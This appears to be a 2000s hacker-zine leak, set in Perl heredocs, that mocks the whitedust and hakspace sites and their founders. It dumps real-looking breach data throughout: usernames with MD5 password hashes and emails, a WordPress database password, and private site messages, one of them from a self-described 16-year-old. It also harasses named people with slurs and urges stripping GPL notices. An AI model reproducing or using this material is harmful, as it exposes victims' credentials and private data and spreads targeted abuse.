admin:25cbe13e867343276018d39cfbaabb4b:cypherxero@gmail.com:http://www.cypherxero.net/blog/ psycho:daaaf13651380465fc284db6940d8478:james@psycho1.com: binary:b73c312ea8b21ff8b85f0b1fd4678384:binary@lockergnome.com:http://www.podcastcorral.com wally:721c5c5d933eeb6ff2fe39be384abda9:wally@hiddenpcmaster.com:http://hiddenpcmaster.com Bridget:fe3178e4b7f3638ebf468f1e8f9a809e:tvguide@gmail.com:http://bridget.tomcort.com tcort:449884d825dc41836cbdf026892220c6:linuxgeek@gmail.com:http://mediumbagel.org M1k3FTP:33970a86eac8055edcf6dfaea582a0ce:M1k3@MikeFTP.net:http://www.MikeFTP.net apex:6eb80f40f424f251b7c5b087a4307d88:apex.81@gmail.com:www.apex81.tk tk422:fff2171ad4d427aa9501b1c68a06931a:jedikillerjango@gmail.com: siliconsnake:f955984cc51135116fee1e9d49720ccc:trent@subzerolan.com:http://snake.destyni.com NasMatic23:1e827fcb4f24791c5582ec15b8df378f:RFTheKnicks@gmail.com: shane:3df5e5bd22bbdb70bce1b604f462935b:shane@computerhelpforum.org:http://computerhelpforum.org the_d:93f298d0557fc3d308e0cc35d6dcad18:thedtenaciously@gmail.com:http://fastboot.com/wordpress oly:d141f75795c7d7a224c0423ebd221dc7:ericjolsen@gmail.com:http://www.ericolsen.net tetsujin:5118394f28be1c11f7322ab20540cf0a:tetsujin420@bellsouth.net:http://s4m.textamerica.com/ Strawberry_Princess:02ac744dfb23cc201993425c48d1f2d9:null@yahoo.com: Poe:6c88beb3367ac44b2b812550c773af84:fakenamefakename@yahoo.com: cerealkiller76:484afee48c8de6ac98e6a27b1ff98fc1:cerealkiller76@gmail.com:http://cerealkiller76.blogspot.com magikgrl:5f4dcc3b5aa765d61d8327deb882cf99:magikgrl@gmail.com: truckercap:3930881fce57482bde17eb7cc15456a2:truckercap@electricjesus.net:http://Electricjesus.net geekboy:831e64f8576b96c0e3bc3d7ff0df7d86:joshbucket1@joshkuhn.net: sligh:5f4dcc3b5aa765d61d8327deb882cf99:bobsligh@gmail.com: redredkroovy:b3646a5da085295d2ca5dd26dd6c06c4:redredkroovy@gmail.com:http://www.txmegabites.net crazy24hraday:569e44e4809b4d0ae43251bf5fa6a67d:garren@gmail.com: Mogwai:a616e565c11d6f090526a89bb01ee68b:tchaplin@gmail.com: syber:19876fc50e51ba427418f884ba64c288:syber@cogeco.ca:http://www.digital-burn.net wyckedone:1527ba13c84b078b056ed0591001f529:wyckedone@gmail.com:http://www.wyckedone.net UserName:5f4dcc3b5aa765d61d8327deb882cf99:eric@eric-b.net:http://eric-b.net Pilgrim:85f81759a9b3a4be6362416f89d534ba:billy_whazzup@hotmail.com:http://www.fewleftstanding.net cyberaxe:bfba25c6dd75f594c4320bf912141353:joker0@gmail.com: lisss001:ea908d1a99007cb5b85d64d70bf08326:lisss001@medway.org.uk: Khabi:49f154e0a49360fcc6c1952d0e2acf1b:iam@slightlyderanged.net:http://www.slightlyderanged.net tinman:e1c78028358076445e69102c6ff7eed6:tinman2k@gmail.com: NEUR0vanity:2968211a15bfb296265b5e32afcc4496:nv@neur0.com:http://neur0.com darkfusion:25fd9986364ebe48bebc13a884d12f57:darkfusion@gmail.com:http://wiredtech.litehedded.com M1k3:cbeb297e821e1a382ca1d30e0abbcf13:mbcomp@gmail.com: marklar:b0283e5dceabcdc4574628bd4bf4ffdb:marklar@dodgeit.com: bcumms:5f4dcc3b5aa765d61d8327deb882cf99:bcumms@hotmail.com: Bobo:bf949e1a46b77066be3a26ee6b6fa82a:craftonk@bresnan.net: togs:8ef2ccab4b6d7dc48ed5bb053d114d95:ctognela@threedd.com: rabbit:5a5beb64f54ffd49e550c2b0ab74ec76:rabbit2k@gmail.com: ComFuLogiK:f7a0f338a9e831896177ccbd7ddb8f57:jfetzko@sbcglobal.net: roumen:4dbaedd11f42b722ec71c9600cfd7947:roman.strobl@sun.com: rdm:8b576e3fc65045936dfbea4e206dbb26:russ81@ptd.net:http://rmmweb.net door33:b991b5881c811edbd90ed12c2a316cb9:frank@slickcode.org:http://door33.sourcehack.org ilselu1:3c497915ed0371a16b9a760810606c20:ilselu1@gmail.com: ZeratulsAvenger:bd07d4d09613b506e4ac565402972de0:zeratulsavenger@hotmail.com: beta:ee3f7b3ce2d750c44b86d8caee326e9b:betanerd@gmail.com:http://www.betanerd.com shoebox:249783e0c78d0bdc4c4df862270a48bc:shoeboxthedog@gmail.com: Muraii:49a1b76eb0b47571f00995850a8657b4:muraii@yahoo.com: willsnake:ec209a86bffe962690db18401a02deaf:willzsnake@gmail.com: 42091_ickim:176030a44e94b7261e894b1b5fea718b:yardfarmer1957@bellsouth.net: StivRichardOff:142cf045581ed681bd2569d6526e2d29:meta2zz@gawab.com: bigHogPidors:afa0080e9463be35600fd250c0d65ebf:titelwey@mail.ru: // ** MySQL settings ** // define('DB_NAME', 'dshadow_blogdb'); // The name of the database define('DB_USER', 'dshadow_wp'); // Your MySQL username define('DB_PASSWORD', 'th3w0rld15m1n3); // ...and password define('DB_HOST', 'localhost'); // 99% chance you won't need to change We can continue bashing cypherzero for each and every post he made on his blog and that would be a useless waste of space. So we'll just let him bash himself. Visit http://cypher0.h18.ru for more lulz. EOCYPHERXERO );} sub ZAP { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOZAP' -- Introducing ZAP -- Have you ever been in a situation where you based your code off of another script, yet you didn't want to include its accompanying copyright notice? Then this is for you. In this case, you have three options: a) Include the notice, because you are lazy and legal. b) Rewrite your program from scratch, because you want your due creative recognition. c) Simply not include the copyright notice. These are also known as: a) The lame way. b) The ego way. c) The elite way! There are various reasons for choosing c. Perhaps you find that if you were to start your code fresh, it would be similar in expressions and control to the code you had before. Further, they would probably do the same thing in almost the same way. Doing so does not seem fair to you. Additionally, by including the GPL in your modified program you have essentially waved moral rights to the code. You have signed the code over, so to speak, and have willingly withdrawn your rights to it. You might feel a bit ripped off. Afterall, perhaps your code is a greater derivation, in both form and concept, from your source than that source is from its influences. A more practical reason exists: Perhaps you hate long, annoying comments from others in your tool, and heck, you are an evil hacker who isn't going to let copyright law alter your practices. The GPL is one example of a copyleft notice that seeks to limit some freedoms to ensure most freedoms. As nice as the GPL is, for any of the reasons above you may not wish to abide by its rules. The GPL is not full of loopholes: rather, every new version is like the next Terminator, only stronger. It's out to get you and you cannot stop it. I knocked a copy of the GPLv2 into molten steel; it came out squeaky clean. If you decide to basically violate the law and not include a copyright license, you may wish to offer some explanation for that choice. Thus, we present ZAP. ----------------------------------------------------------- | | | ZF0 Anti-copyright Pledge (ZAP) | | | | | | 1. This code may or may not be derived | | from one or multiple external sources | | with or without express permission. | | | | | | 2. We reject the general universal applicability | | of software copyrights to all cases based on | | any combination of the following: | | | | a) The vagueness of the Agreement on Trade | | -Related Aspects of Intellectual Property | | Rights in the area of software rights. | | b) The lack of cohesion of different | | national copyright legislation. | | c) The lack of originality in software and | | the lack of establishment of originality. | | d) Further personal opinions. | | | | | | 3. We reject the assumed right of verbatim | | copyright control over all revision. | | | | a) Particularly in free software, a copyright | | serves as recognition and little else. | | b) We will extend recognition as we | | feel it is deserved, and not less. | | | | | | 4. This statement does not attempt to | | serve as a legally binding document. | | | | a) This notice is an explanation, not a limitation. | | b) These are terms of release, | | not conditions of use | | c) This software is thus provided as-is | | without any guarantees or warranties. | | | ----------------------------------------------------------- You are free (of course, how could we legally stop you?) to use this. You could include it directly, or even just say something along the lines of "See ZAP for copyright terms" or "Released in concurrence with ZAP principles". EOZAP );} sub Whitedust { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOWHITEDUST' ==intro Why are you trying to prove shit to me? You hate me for no reason?! :) # All IRC quotes taken from conversations not including ZF0 members - we wouldn't IRC with psg In ZF02 we had a Call For 0wning in which we detailed how Mark Hinge, aka psg, aka |PaRiS|, aka Voshika, aka any other gay nick, needed to be owned. Allow us to tell you a little story of how he and his bum buddy Mark Anderson (aka Cronus) got owned through the roof. We call this story "Two Marks don't make a Right". These two young fools spent the 1990s pretending to be hackers. Cronus was a lead contributor to the Discordant Opposition Journals (DOJ), which never produced any technical content. psg contributed to the Syndicate of London Journal/Annuals (soljo, maybe "solja" was too feminine for them), which also has not produced anything intelligent. However, these two wankers wave their journals around as their hacker cred. Collectively we may refer to these two, and their chav friends like fwaggle, steinsky, and chickensoup, as the Syndicate of London (SoL). We are unable to find any period in time in which SoL actually did anything. As far as their written record goes, it seems they claimed to be hackers, and then wrote some shitty zines talking about how they were hackers. I term these men "fake hackers"! Seriously, they knew how to type and how to use the internet in the early 90s. Congratulations fucktards. Let's flash-forward a few years. Enter 2005. They still hadn't accomplished anything. But then Cronus (that's Mark Anderson, in case you have forgotten already!) decided to make some money off of being a fake hacker. So he put the capital behind whitedust.net and got psg (Mark Hinge) to be the lead bitch. It was supposed to be the world's best independent online security news source. However, it completely lacked legitimacy. The Marks did not actually know any real hackers, and could not be ahead of the pack for news. They became resellers and relinkers of news that appeared on other sites. They would also try to create news or add unoriginal commentary to try to appear unique. They also tried to support unprofessional news items to get more hits, and would desperately attempt to get slashdot and other sites to link to them. They wrote their own Wikipedia articles about themselves to try to increase their profile. and *I* "mispresent hackers" <- sure do Whitedust has never been taken seriously by hackers (except those of us who were serious about owning it!) From then to now they have only become worse. Just to clarify, we are not among the groups accusing SoL of "selling out". They never had anything to sell. Had they been talented, hell yes they sold out! The fake hackers searched desperately for ways to make money off of being fake hackers. They started hakedspace, err, I mean "hakspace", a myspace-like site in an attempt to lure the 13 year old virgin fake hackers of the internet to generate ad revenue for themselves. They took all of their shitty content over the years and put it into a book, and have desperately tried to sell a copy. They tried to host a hacker conference in September 2007. As we have seen, that didn't happen. The SoL are trying as hard as possible to make as much money as they can off of kids and/or php coders who don't know enough about hacking to realise how full of shit the SoL are. These kids will find themselves mislead and not provided with quality information. These kids will start to think they are just as hackerific as Cronus and psg, while really just learning how to be just as shitty. I am not a hacker... i am a marketeer. That quote is refreshingly honest. It would be more pleasing to see it on the "About" page of Whitedust than in a small IRC chat where it may not have ever been repeated. Now psg tries to backtrack and be like "I wasn't actually aware any of the wd staff ever claimed to be hackers anyways". Let's see if I can think of any examples...wait a second, how about that time you wrote your own Wikipedia article, and then put yourself in Wikipedia's category "British Hackers"? Check it: http://en.wikipedia.org/w/index.php?title=Mark_Hinge&oldid=69843817 ==fresh So, shortly before our release, SoL found out they were owned. But they are still fuckin' hilarious with how they try to deal with that. They wrote a self-deprecating post for the sites. Their big ace in the hole was that they had some emails with KODD. See, after KODD owned them, KODD was contacted for some purposes. Now, SoL claims that the KODD email had actually been expired, and after the own SoL picked it up. Maybe that's how it happened. Yet, I think you'll agree that that was unlikely and is probably just another lie. First, it takes time for hushmail accounts to expire. Second, if that was true, and they had just stolen the account from KODD, then the only way KODD wouldn't know is if they never even tried to log in. Despite making a defacement and passing around the email, would they really not check it? Doubt it. Would they not change their website to indicate a new email? Doubt it. It is more acceptable to conclude that either KODD got pissed off that whitedust was owned without them, and then passed the emails to WD; or that KODD has some serious overlap with the SoL core, and/or directly *is* SoL, vis-a-vis the '99 days. Either way that is the risk you take when you share with other people, and that is a risk that was well prepared for. WD doesn't really mention it, but those emails did not contain any compromising information. "Chest-beating" existed to obfuscate vagueness. So basically the entire post was a story leading up to their great trump, the emails! How they dealt with the own is just funny. In order to make our work seem less impressive, they started detailing just how many times they know they have been hacked. It was like "$A hacked us through phpizabi. Then $B hacked us through phpizabi. Then $C hacked us through phpizabi and defaced us. So then we figured it was time to stop ignoring our lack of security. And then $D owned us through completely unguarded input. So $E really isn't that special." It gets more hilarious as they failed to realise how big the problem was. Despite the email clearly saying that we had owned Whitedust itself, they simply didn't get that when we own we 0wn. They wrote their text without realizing that we could destroy them in any number of ways at any moment in time. It's easy for them to blame phpizabi or to say that psg was the victim this time. What they need to realise to survive in this world is that every single person along the line failed them. They have security issues at any level you can have an issue at. They barely have a grip on XSS, let alone an idea of how to handle SQL input or other user-defined input. They don't know how to manage or maintain the integrity of files. They don't know how to design things to limit the damage from a single breach. They don't know how to find secure web applications nor how to write their own. They did not do a single thing in all of our research that impresses us. We will detail or hint at much of these issues below, but many of them will stay with us as our own personal collection of Whitedust 0day. The first thing they could do to help the problem is scrap WD3 entirely and hire someone competent to make a fresh CMS. And, jake, you stupid sheep-raping wanker you, it was CF0 and ZF0. With zeroes, not O's. Get it? Zero for 0wned? The 0 means 0wned? Right? Right? Fucking retards. On with the show. ==hakspace.net Hakspace is the place to start, simply because it was very publicly humiliated. Basically the Marks decided to use a very shitty piece of open source software as their lame management system. This LMS was full of hilarious holes. It didn't take us any time to own it and find ourselves exploring. However, this is not anything to brag about, since a few other groups or individuals have done the same. One group, the Knights of Dynamic Discord (KODD), decided to deface the website. See their text at http://kodd.66ghz.com/18.txt. Cronus and psg were so stupid that they either didn't bother taking a look at the LMS they wanted to use to power their hakspace, or they simply were too incompetent to see how poor the code was. Either way they deserved a good owning, and that's what they got. There is no need for us to go into much detail in this area. After hakspace got owned: [ WD Manifesto ] "From this point on we will not indulge in juvenile destructive squabbling that plagues the web" [ ZF0 roffles ] "Yes you will, just on the losing side!" Let's have a small tour through their database from before the defacement. ######################################## INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`, `subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('16', '10', '32', ' ', 'To: xjessicax Hey!', 'Thanks for adding me as a contact. While my profile says 30 something, I'm 16 as well, and I wouldn't mind getting a chance to talk. IRC or AIM sound good? -zach', '', '1175887522', '1', '1'); ######################################## Check it out, zach is not really 30, he's 16 for the purpose of hooking up with xjessicax! If you want to cyber her aim is xjessicaislegend (the reply was favourable to zach's cybering attempt!) ######################################## INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`, `subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('27', '88', '1', '' , 'Re: you have been busy', '[quote] congrats. Hakspace looks good so far. Is there anything I can do to help spread the word? [/quote] Tell everyone you know. Invite everyone you know. Post it on forums. Submit it to Slashdot until they give in a post it! :) Cheers,' ######################################## psg has such smart Slashdot manipulation skills. ######################################## INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`, `subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('52', '4', '7', '', 'To: QUEEN Hey.', 'You seem to elude me a little bit. You seem, to me, to be mostly a dominatrix style mistress-of-hatred-and-pain. Now, I guess this leads me to wondering where in the "hacking" category you fall under. # <- that is not what it gets us wondering What is your definition of hacking? I'm just curious. :)', '', '1178209412', '1', '1'); INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`, `subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('53', '7', '4', '', 'Re: Hey.', 'Firstly I am not a Dominatrix, I am a lifestyle Domina. I am a sadist who enjoys the BDSM way of life. I am a loner, a weirdo, a freak. I have few RL friends. I like it that way. I spent 3 years of my life in hospital. I always love computers when I was out.. My computers/s are My life. I quit my business degree to study programming and software engineering. I was heavily involved in warez and fxp for the last 8 or 9 years. I did not want to be a script kidddy. I wanted to learn to code. Coding, scripts, computers suit my mind. I will not claim any elite skillz beyond my passion. I will always prefer computers to people. I will purse my major and then continue with computer engineering, assembly is of particular interest. Consider me below your standards.. its not what I am woried about. I have passion and a lust for learning and mnay years to make up for. QUEEN INSERT INTO `phpizabi_messages`(`id`, `to`, `from`, `attachment`, `subject`, `body`, `box`, `date`, `read`, `sent_copy`) VALUES ('56', '4', '7', '', 'Re: Re: Hey.', 'Huh. Well said. I guess I never pinned you as the computer science sort of person, but I guess that goes for stereotyping. My apologies if calling you a dominatrix offended you, I'm a wee ignorant on the subject and I'm not sure if there is a distinction I'm unaware of. Elite skills seem to be something born in movies and book. People are only as good as the things they do regularly and the fabled d00d-can-get-into -anything is so elusive I doubt the existence. In your statement, "Consider me below your standards" I hope you don't mean me, personally. I'm afraid my message may have seem ed hostile. It wasn't intended to be. I merely sent the message from boredom at work and curiosity since I haven't really talked to you before. Are you going to school for programming, or is it just a hobby? What languages are are you experienced with? Which languages are you a novice with? I suppose it wouldn't be fair to sound like an interviewer, so I'll say a little about myself. I'm commonly known as Comrade Smack, though people who know me personally call me XaQ (pronounced: zuh-ack). Information Systems Security is m y thing and I am going to school for it. I'm 20. I'll be getting an associates degree in June for Computer Networking and I'll be g etting a Bachelors in Information Systems Security in June 2009. I work at a retail store as the IT department. I have my own office, it's a pretty sweet rig (pictures coming soon). I currently have a few projects going. One seems to be a large step in the direction of Hacktivism, another is just "the next MySpace." The first one has to do with using steganography with network traffic, details I can't really go into. I don't want to compromise the mis sion. The second one isn't a social networking site, but I think has a niche that should allow for massive expansion, though I think I'm keeping it "underground" via invitation-only and amongst friends. <-- Check out his elite hacker projects I guess I'm bored at work again and felt like chatting. -Comrade Smack "XaQ" Tacular <-- Comrade Smack can now pick up lots of girls since he is in cDc-NSF ######################################## ^ That's just funny. Now time for some hashes! Here are the hakspace.net lusers from before the defacement. psg', 'e7e9f43efcb7f72bca72aad5b79b7847', 'psg@cdc.nsf.com', narcotic', '69f1cc5a16638c0dfbc583c9b5798297', 'douglas@qu4ck.com', Swordoath', '1f90c3c0b4a54825c7e2ebd938dbadb1', 'Sulock@gmail.com', Ender', 'c909baa24666b7324e249cea04b311aa', 'axandalite@hotmail.com', riscphree', 'e10adc3949ba59abbe56e057f20f883e', 'riscphree@gmail.com', zPr', '617e1b5742522efda897ec532e09882c', 'shaitanx@gmail.com', QUEEN', 'a9f52634ba775a5c2baada52988107d0', 'info@rubberqueen.co.nz', skapixie', '358c242447244cce5aa241e00cc3885f', 'lorz52@hotmail.com', Smack', '4d86b29292a7402d5b3f71343047214b', 'smackt@gmail.com', shaman', 'bed128365216c019988915ed3add75fb', 'jon-hakspace@planzero.org', xjessicax', 'ddd956c117486cba6efef9fcc4c38549', 'todreamofautumn@gmail.com', claustro', '61ec9201ca32d4cb541441c454aa2cc6', 'ma_gerrer@yahoo.de', LEET', '3b0729efc5953de90b519246085bdd01', 'rosenburgbobby@hotmail.com', Fanta', '7cb614b87fb376583c98944293fd983c', 'fantaloonastic@hotmail.com', naxxtor', '3dc69416b0783cac9f3dda37b6bb0862', 'naxxtor@naxxtor.com', Luke', '9d2df5a492765f03fca897a06c0be9fd', 'shaggstarr@msn.com', HellzUK', 'd8578edf8458ce06fbc5bb76a58c5ca4', 'jswray@hotmail.com', dfa', 'c0ba9fe956a08dabe9df09e3b0d71276', 'deathfromafar@code-monkeys.org', Tidus', 'e0f9609e3728136571be14d60e76d4ca', 'tidus333@gmail.com', ckopacsi', '7241a98997b6f00f29716b86ce4466ac', 'ckopacsi@yahoo.com', libertate', '8993c542ca1d8a4fa3630d47ed548107', 'libertate_@hotmail.com', eris23', 'adfae8dd0b15b0c584af67735fb9e704', 'jdkatz23@gmail.com', bawb2', '10a015a9cd71995e3c510bd00768e66b', 'bizzawb@gmail.com', drache', 'bb562a650bfc24b6fc64e746ee65c8c3', 'me@grog.mine.nu', fuser', '3123b5594d76d6ba67e7985f5d0ea411', 'hadri90@gmail.com', talnprime', '8b65996657feab900109f216f4b951b6', 'talonprime@gmail.com', sivakrish', 'b2f7d6e27829d7da30ab470e11a67a6e', 'sivakrishna123@gmail.com', l0gic', '161a09bd22c4a05b3fd96382fac46995', 'l0gic@l0gic.net', bhninja', 'fa6836be737073c2dd94f73e62496ea5', 'jdrewm@gmail.com', terminal', '6c3be46e5ec46fba63e8a423fc6dd4e9', 'firespeaks@yahoo.com', bky', 'fc4e582f933a07bd3e5746f9eb5a80f6', 'bkystarfleet@gmail.com', krovisser', '5416d7cd6ef195a0f7622a9c56b55e84', 'nick@selfunaware.com', XiTDiS', '1404834e52a4c6cac9444f1fb3c62d3c', 'blueeyez112@yahoo.com', DaMacc', 'c80805b69106298d5cc5ecc02c6171a4', 'elquinte@gmail.com', LiX', 'b369b8022e21e83d7f2ee375b2a54971', 'lix@valvesoftware.co.uk', kingofall', 'eb89f66c39c270c05f008c38f3ce39b8', 'king_of_all1@hotmail.co.uk', transend', '42a53c990a1075e82a61bf0a7a5ac812', 'transend@dcemail.com', Tzunamii', '7009a1360ccbf034f391872fae01a8be', 'tzunamiii@gmail.com', mbalboa', '19462fa8ea158e21f53ead18b458ec16', 'mbalboa@gmail.com', limeyhaqr', '7e3eed005a0edafba5da7fe573e3bf16', 'limeyhaqr@gmail.com', emonk', '82f0035fbb0c2ef33b1b672b82410fdd', 'root@quicksilverscreen.com', gator50', '3d04dacf96ba524b32d037bc9c8c7ccc', 'acidpains@aol.com', Brok3n', '4f327b59dafbe24f8cae197d6aa31e56', 'Brok3n_5w0rd@hotmail.co.uk', Augustus', '352188e31495f29989ac7ceeb3f91dc1', 'vq42tf03k8m1z7y@temporaryinbox.com', netf1r3', '21b714346434f88c8a64f164b4162ad8', 'netf1r3@byte-error.com', shazaum', '4c7134c470ba60d2137278c260777da3', 'shazaum@gmail.com', Netduke', '406b8494aebf3163c059a733fedfca2d', 'netduke@gmail.com', renakuzar', '78d48a2ab51f927c079bda1bed7a4d1d', 'renakuzar@yahoo.com', adastra', 'a8e4f703f5298c1876e07a630dc9d6d4', 'jewuviha@mailmoat.com', ponchio', '6c51415c108a188411970154b60ee3b4', 'ponchio_69@hotmail.com', michelper', '2aee1c40199c7754da766e61452612cc','michelpereira-hakspace@gmail.com', Xenocide', 'da197b6961afb3f963f66e20c6ea1b7a', 'xen423@gmail.com', enigm0r', '6c29e9cc4042d972b15ff0304e636886', 'dbuckwalter@gmail.com', _X_', '9cf0fad66f27ca22b7ee721d5413ea62', 'mreckz@users.sourceforge.net', ReVoLT', '80ae98c5020864ffa34e695d784f9b97', 'revolt0163@hotmail.com', pingwin', 'dc56bc33e196d040032d060be72a659e', 'pingwin@gmail.com', wangmm', 'b50aea55b0916e54a95fe1e2cb236359', 'wangmm@gmail.com', FreakyKid', 'cea46d12b67dc9e39b406f5fed6f3f2b', 'seg_fault@rogers.com', Dimmae', '2506da4c95f2d1e78c1b597c879d91c9', 'dimmae@gmail.com', Zakolus', 'e559a8e8404d94586b3ab25059ffe91c', 'zakolus@gmail.com', Felonious', '11a7f956c37bf0459e9c80b16cc72107', 'mrchesnutt@gmail.com', fuzz', '7aabd294bd89be4256e932c34609b671', 'fuzz@missouri.edu', prs', 'e6b25291f1ae97f52a70f08bd245b456', 'hakspace@forensix.info', sado', '90bcb9dc73b614d0a5bdca71198b2a84', 'sadistic0ne@yahoo.com', slappy', '293cb6af8d9939b04d3980e3ea6e4055', 'brandonfungus@hotmail.com', father', '0d19b46d1818223ce51bea65d3775d88', 'fatherlaptop@gmail.com', SH1R7_GUY', '21af0671b5f06ed531a9c5c44fb4f57d', 'sh1r7guy@hotmail.com', HackerJax', '4ab3a53629d8013ac8b105f976fad9f8','matthew_dozier@csumb.edu', lferette', '76c07f8905c4282170453c1e4c1c3805', 'lionel@ferette.net', snid', 'b4d92944c7a9a90cc60a89ddeaa938cd', 'xsnidx@gmail.com', rafi', '552fa99dc520c6590e2251f95c5ba01a', 'rafi@openu.ac.il', sol', 'e7e9f43efcb7f72bca72aad5b79b7847', 'paris@soljo.org', Kussic', '68de7d90df7867309d9b8ae4fb39c4d3', 'dotari@mac.com', Belial', '7e59cb5b2f52c763bc846471fe5942e4', 'b3l14l@gmail.com', Vesalius', 'cf6ba6acf6b315448d10ead50eb4a8fc','ollie@whothehellareyou.info', fbicudo', '245fa9ddf2c4e71acb2a939b953dc193', 'fbicudo@gmail.com', fenrir', '3adc6d0d78fc14e9037d469e80c36b83', 'willlobo@yahoo.com.br', st3x', 'e9f1e0b13b8a60d76bd23d3e11f3de75', 'st3x@hotmail.com', <-- this guy big psg fan idsguy', '8b2680de52c6aecc0547dab63272962e', 'ntxpla@gmail.com', k3ys3r', 'bd564cea7e9c983eb4a63e88a9a49406', 'jacktrice@gmail.com', x4e', '4ca6b00c0eac493f54032c99098c4be9', 'x4e@x4e.org', liquidfis', 'a99f847e5dbe676070c86a0cc377b594', 'liquidfish@gmail.com', r00t619', '2b781b373d7775f4047d9c82f9174a80', 'r00t619@gmail.com', screv', '4aaad5269c580a6afd8333d73e417b5e', 'screv@hotmail.com', Xing', '352512781dc959dbefc4972a09506e24', 'xxing66@gmail.com', myleslong', '667faa4c7d37d34274999baf244b512d', 'myles@cultdeadcow.com', drraid', 'f2bc5b1d869870d7688f71b2d87030bd', 'drraid@gmail.com', temp124', '6bf93203ed3bdb7516d0882a27b9758e', 'temp124@kimptongroup.com', circuit', '63e30cd76dd8fc1d3125fa49c18988f9', 'circuitbomb@flyninja.net', torpedo', 'f78a580f771c9756b7b6642a87ea68ea', 'torpedo@freeshell.org', niles', '5297b609864f97c7386aa4adf47e7e40', 'niles@bluebottle.com', offset', 'fbd1baa2d62ce5761cce36b9e4143c0f', 'offset@ubersecurity.org', SickMule', '9291e4e9ded00b910290600132ab5406', 'embaumbach@gmail.com', SupaSaru', 'd0763edaa9d9bd2a9516280e9044d885', 'pockets@techemail.com', ABitsLife', '807ca4ea007f27f78d1865623bd2bc1e', 'jamesbailey272@yahoo.co.uk', zinya', '54ccda6d29fed4b41f399682456d715c', 'kitty_84@tiscali.co.uk', hyper', '6b818a3a6bf1234ed24c940021922b63', 'hyper@hackervoice.co.uk', MuNk', '5a563b891ee3bafc70344ab3a2576008', 'lordmunk@gmail.com', Mooseh', 'c80fd33e5eba8563eb1c29fbb543e0b6', 'tom@m33p.com', welp', '37ec0e14a066d91304fb40f67da664aa', 'welp@01welp.co.uk', cDc', '28d5cee115ff25080e24caad14451d46', 'webmaster@cultdeadcow.com', pickle', '18909715fe3d3e416c6201d8d155056a', 'picklejuice@gmail.com', FutureBSD', 'e494a78ee3a498515f47fd7f13ac1d28', 'FutureBSD@web.de', hardwire', 'e2a351479a35e2a257f8d5fa4b5a35e0', 'hardwire187@gmail.com', nrogeist', 'b9bde5159657ac5ff36eebcbb420662a', 'neurogeist@hughes.net', b00L3an', '38aa067181be3d22d4f73f526661db22', 'b00L3an@gmail.com', makash', '8b18af3064e5b7db68ed2aa3b0d63aab', 'akashmahajan@gmail.com', luis', 'b40ff2483ac0286054c67119c6222e3d', 'spiderkid@gmail.com', xugar', '0e1bf2aa9c4fa6d25f05f843bbd573b1', 'brenodario@terra.com.br', hash', 'dc551b6164161c85eb4deffa624e2c06', 'carloslnx@gmail.com', pevnia', '352cc7fb39e725e2ab060958cb3b9c66', 'pevnia@gmain.com', int3', '89794b621a313bb59eed0d9f0f4e8205', 'rvillordo@gmail.com', borkedpc', 'ec441f74c2a5cdbef278096c4fc5c1df', 'hakspace@grepmail.com', LoveLace', 'ca80615d68258e3e4479e08cac47e8d3','troi_delmontes@caribline.com', ketameme', 'f5fe800fe70bb976241de58d0dc9f61e', 'dx00dx01@gmail.com', alvaro', '316f9c20b651d17af88735dff86916f4', 'alvaro@yotec.eti.br', rvltnpwn', 'ed5439d07ea620fc2a664e8df1c78e48', 'revoltingpawn@yahoo.com', J0rd4n', 'dfabd32b59b03307dd2511eda5c3d357', 'jordan_facey@hotmail.com', aegis999', '2508afe4c471866d99cf8662a16686e8', 'vgsecur1ty@yahoo.com.sg', peejay', '2cd6baf8d4fa6ab4a4a0cb758d69b473', 'surrealjason@yahoo.com', goodboy', 'ceecb8415e84644a7769214c22e94335', 'alexstol@yahoo.com', BigDog', '13f3252e480b324235375d95c509dcae', 'Cerberus14873@comcast.net', Gypsie', '38867e6de4a1d8740fb7dc15771086d8', 'jennie313@yahoo.com', stdin', '57184b0f18edcfa871de8f3bc6d175e6','stdin@electronic-music-alliance.com', CorpDraco', '9d36a42a36b62b3f665c7fa07f07563b','wolfw1peacekeepers@yahoo.com', ihustle', '0d107d09f5bbe40cade3de5c71e9e9b7', 'illtype_persona@YAHOO.COM', kshymkiw', '9bb04f7e14ea008432618c683cf3efe0', 'kshymkiw@gmail.com', Motogi', '5013c05541fc21b09bb1617be8e76f45', 'Vequoine@yahoo.com', TMHatr', 'd10096a9193be0834de0be5d516dbd49', 'TMHatr@yahoo.ca', Hattr', 'd10096a9193be0834de0be5d516dbd49', 'tmhatr@gmail.com', Viraj21', '5fcfd41e547a12215b173ff47fdd3739', 'viraj_slk@yahoo.com', mangler', 'cb74b9adcc2641eba78830342f94a56c', 'jasonmori@gmail.com', red22', '0c8b042e41600534af1672799e445775', 'm4n2a0@hotmail.com', duckster', '83166cdeb7a2d9c1d591ad9d4eff4204', 'nwhere@gmail.com', amigo', '42a3761e9aef7a2fe81295099c289a93', 'amy@hackinthebox.org', serif', '8eb650bbdd292c5c69a0659d9209b630', 'morgan@datalinkcontrol.net', cr0w_', 'f22ca7296a624acf877c519c07e8767f', 'kyougu@gmail.com', Drew00013', '0213a9cd31784ba9eb69ae2536dc5f46', 'drewmayes@gmail.com', Aranje', '184bcaee3f7cc6f1af70de93dc8e5b50', 'orangewinds@gmail.com', 10nix', '1ab1bf6d0a6f97e2cc71fe755c2336dc', '10nix@hackervoice.co.uk', md5', '26fe0cdfe99bfa306e31733c4e2b17dc', 'md5pass@googlemail.com', 4ssembler', 'ab1c0c12bfef99600bbc1f3478595f11', 'gruberjl@gmail.com', Stumbler', '900ae31a3ae38757c4b98e654dd34591', 'uppman421@yahoo.com', verbal', 'f56fdc49bbc079923c1dd913c5d1f717', 'verbal@smashedstacks.net', gloomer', '1e5e95662da0bf42ce2f0d5c7f0f662e', 'yo_muffinman@hotmail.com', melphos', 'a9da0784806d18af545e35836a2e1933', 'melphos@gmail.com', righty', 'd73e4cf8fe7ddf288c851bf25a27427c', 'rightcoast@gmail.com', Blade', 'cf0d151dd4cffefec01d59f38afd8e94', 